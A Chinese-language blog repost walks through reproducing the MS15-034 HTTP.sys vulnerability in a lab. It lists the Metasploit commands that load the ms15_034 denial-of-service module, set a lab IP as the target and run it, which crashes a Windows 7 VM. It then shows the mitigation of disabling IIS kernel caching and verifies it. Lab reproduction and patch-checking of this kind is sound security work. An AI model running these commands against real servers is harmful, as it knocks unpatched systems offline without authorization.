ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)

2022-08-16 01:31:49  阅读:224  来源: 互联网

标签:HTTP 1635 Windows SYS 漏洞 ms15 2015 034


CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)

一、今日目标:

复现一个代号为MS15-034的漏洞。

二、漏洞描述:

在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。

三、使用工具:

kali linux、windows 7虚拟系统、metasploitable linux

四、具体操作:

1.在kali登入msfconfole

image

2.搜索代号为ms15-034的漏洞

msf6 > search ms15-034
image

3.准备攻击

msf6 > use 0 #进入
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.30.130 #设置被攻击的ip
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > exploit
image

4.攻击结果

攻击开始后,win7瞬间蓝屏然后自动重启,截图如下:
image

5.修复漏洞

禁用IIS内核缓存(可能降低IIS性能)
image
image

6.检验修复

再次进行攻击,则无法成功,说明修复成功
image

标签:HTTP,1635,Windows,SYS,漏洞,ms15,2015,034
来源: https://www.cnblogs.com/luuxiaoming/p/16590228.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有